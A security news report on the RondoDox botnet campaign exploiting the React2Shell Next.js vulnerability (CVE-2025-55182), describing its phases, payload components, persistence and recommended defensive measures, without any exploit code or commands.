Cybersecurity researchers have detailed a sustained nine-month campaign targeting both IoT devices and web applications, ultimately conscripting them into the RondoDox botnet. As of December 2025, CloudSEK analysis confirms the campaign is actively exploiting the recently disclosed React2Shell vulnerability (CVE-2025-55182, CVSS 10.0) as a primary entry vector.
React2Shell affects React Server Components (RSC) and Next.js, enabling unauthenticated remote code execution across exposed environments. Despite public disclosure, the Shadowserver Foundation reports that approximately 90,300 systems remain vulnerable as of December 31, 2025. The majority–around 68,400–are located in the United States, with additional exposure noted in Germany (4,300), France (2,800), and India (1,500).
RondoDox Campaign #
First observed in early 2025, RondoDox has steadily expanded its operational scope, incorporating multiple N-day vulnerabilities such as CVE-2023-1389 and CVE-2025-24893. Abuse of React2Shell for propagation has been independently validated by Darktrace, Kaspersky, and VulnCheck, further highlighting the breadth of exploitation in the wild.
Researchers outline three clear phases leading up to the mass exploitation of CVE-2025-55182:
March – April 2025: Manual reconnaissance and vulnerability enumeration
April – June 2025: Daily broad-spectrum probing targeting platforms such as WordPress, Drupal, Struts2, and IoT hardware including Wavlink routers
July – Early December 2025: Large-scale automated deployment occurring hourly
In December 2025 incidents, adversaries were observed scanning for vulnerable Next.js servers before attempting to deliver multiple payloads: cryptocurrency miners (/nuts/poop), a botnet loader and health checker (/nuts/bolts), and a Mirai-derived binary (/nuts/x86).
Malware Behaviour and Persistence Mechanisms #
The /nuts/bolts component maintains botnet control. It terminates competing malware families and coin miners, then retrieves the primary bot binary from its command-and-control infrastructure. Certain variants extend this behaviour by removing Docker-based payloads, historical artefacts from previous intrusions, and associated cron jobs. Persistence is commonly achieved through modifications to /etc/crontab.
CloudSEK notes that the tool “continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds,” which effectively suppresses reinfection attempts from other actors.
Recommended Actions #
To reduce exposure to this campaign, organisations should:
Upgrade Next.js installations to versions patched against CVE-2025-55182
Segment IoT devices into isolated VLANs
Deploy Web Application Firewalls (WAFs) capable of blocking known exploit patterns
Monitor for anomalous or untrusted process activity
Block known C2 infrastructure associated with RondoDox
Source of information: The Hacker News
Leave a Reply